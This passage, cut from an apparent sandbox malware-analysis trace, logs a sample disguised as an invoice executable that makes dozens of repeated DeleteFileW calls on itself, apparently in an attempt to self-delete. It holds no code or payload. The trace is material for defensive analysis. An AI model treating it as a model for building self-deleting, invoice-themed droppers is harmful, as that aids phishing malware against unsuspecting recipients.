Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.783] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.784] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.784] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.784] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.784] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.784] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.784] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.784] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.784] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.784] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.784] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.785] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.785] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.785] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.785] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.785] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.785] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.785] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.785] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.785] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.785] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.786] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.786] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.786] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.786] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.786] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.786] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.786] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.786] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.786] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.786] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.787] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.787] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.787] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.787] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.787] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.787] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.787] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.787] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.787] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.787] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.788] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.788] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.788] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.788] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.788] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.788] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.788] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.788] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.789] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.789] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.789] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.789] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.789] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.789] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.789] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.789] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.790] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.790] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.790] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.790] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.790] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.790] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.790] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.790] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.790] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.791] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.791] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.791] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.791] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.791] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.791] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.791] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.791] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.791] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.791] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.792] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.792] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.792] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.792] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.792] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.792] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.792] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: 